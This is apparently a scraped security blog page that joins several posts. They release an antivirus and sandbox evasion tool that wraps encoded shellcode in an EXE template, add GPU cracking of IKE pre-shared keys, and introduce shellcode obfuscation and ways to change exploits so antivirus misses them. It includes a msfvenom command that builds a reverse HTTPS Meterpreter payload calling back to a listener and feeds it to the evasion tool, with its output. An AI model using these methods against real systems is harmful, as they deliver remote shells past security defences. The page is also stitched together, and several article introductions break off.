Ok, here we are..
Thank you for your patience. It is time to release the version 0.1 of the “tool“.. 
The archive is composed of:
- An EXE template (ultimate-payload-template1.exe) which manage the sandbox evasion.
- A Perl script (ultimate-payload.pl) which read a shellcode in binary format from STDIN, encode it, and build a new EXE file based on the template.
- The source code of the encoder (in assembly) and the template (Visual Studio 2008).
The (stupid) sandbox evasion technique used in the EXE template is explained in the part2 of this story. And the output of the tool is shown in part1.
I do not expect it to bypass all AVs forever. I guess new signatures of the template will appear shortly. But don’t worry, all you have to do is to modify the source code of the template, and recompile it. In case of new sandbox problems, just use your imagination
Note: this technique doesn’t work anymore against MS Essential Security. For this reason, I wrote a new version (0.2) with a new technique, but this one will not be published.. (yet). However, a little bird told me that using a stupid junk loop in v0.1 would do the trick against Essential Security
Download the tool: ultimate-payload-v0.1.tar.gz and read the HOWTO.txt file.
As usual, be nice. Ask the permission of the owner before infecting a computer…
Enjoy
Foip
(4 votes, average: 4.00 out of 5)
Loading ...
psk-crack (ike-scan) CUDA add-on
UPDATE: Thinks are moving well on Hashcat.net ! https://hashcat.net/trac/ticket/5
Hello,
If you are familiar with ike-scan and you hold NVidia card(s), you could be interested by cracking Pre-Shared Keys with your GPU(s).
As it is my first CUDA/GPU implementation and that I have limited knowledge of cryptography, this code must not be considered as optimized. Technically, I only reused basic source codes of MD5 and SHA-1 inside a CUDA code. Don’t blame me. I was working on a pentest and I thought : “Cracking this PSK could be nice for my report, let’s do ‘man cuda’ .. ”
To give you an idea of the improvement, brute-forcing the PSK “hello1“requires about:
- 2 hours and 50 minutes with CPU (HP EliteBook 8440p - 2.5GHz Intel Core 5)
- 2 minutes and 40 seconds with GPUs (GTX480 + GTX570)
It’s not that bad for a first try, even if the occupancy rate of the cards is low.
Hello,
Here is the PowerPoint presentation explaining the sandbox evasion technique, used in the part 1 of this story (see Antivirus Sandbox Evasion (par1)).
Enjoy,
(1 votes, average: 5.00 out of 5)
Loading ...
Hmmm, it seems that I wrote something very nice ..
$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \ | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe [*ultimate] Waiting for payload from STDIN [*ultimate] Payload: read (size: 367) [*ultimate] Payload: encode (new size: 1161) [*ultimate] Template: read 94720 bytes from file [*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928 [*ultimate] Output: add the begin of the template (size: 36928) [*ultimate] Output: add the encoded payload (size: 1161) [*ultimate] Output: add the end of the template (size: 18502) [*ultimate] File '/tmp/payload.exe' generated (size: 94720)
WTF is that ? “That” is my new toy. An Antivirus evasion tool which bypass signature, heuristic and … sandbox detections
Simple shellcode obfuscation
1. Introduction
This article aims to provide you with the different steps needed to develop shellcode obfuscation techniques, and their respective deobfuscator assembly stubs. This should help you to learn a bit more about IDS and Anti-Virus evasion techniques, and more than that, to give you a useful template to create more advanced obfuscations stuffs.
Don’t be confused, we are not talking about shellcode “encoders” since we do neither modify the opcodes nor remove any bad characters. We will just hide the shellcode and – hopefully – break common shellcode patterns. It means that your initial shellcode must already be NULL free or some.
While obfuscating (or encoding) a shellcode with your own method will not help you to bypass all anti-virus software (thanks to sandbox-based AV), it is a useful step to achieve it (but this discussion is out of scope for the moment).
There are 3 main parts in this development:
- Obfuscate the Shellcode with a Perl script (or any other language). The result will print a shellcode in C syntax.
- Write the assembly stub, able to reverse the shellcode in its initial state, and start it.
- Tune the stub to make it reusable and put everything together.
1. Introduction
If Metasploit encoders are great tools to avoid Anti-virus detection of the Payload (meterpreter, reverse_tcp, …), it is not always so easy to avoid the “Exploit” detection.
No. This article is not yet another tutorial explaining how to type “set ENCODER xxxx” on your keyboard.
In this post, we will show you how to break the anti-virus detection of your favorite exploits by customizing them a bit (modifying the source code) by using a try-and-error method. Keep in mind that everybody is able to do this. Sometimes, you just don’t know it. This is why I wrote this article 
.
In this demonstration, we will work with McAfee Anti-Virus. It doesn’t mean that it should work with all other Anti-Virus vendor without further modifications of the initial exploit, but the method will be the same.
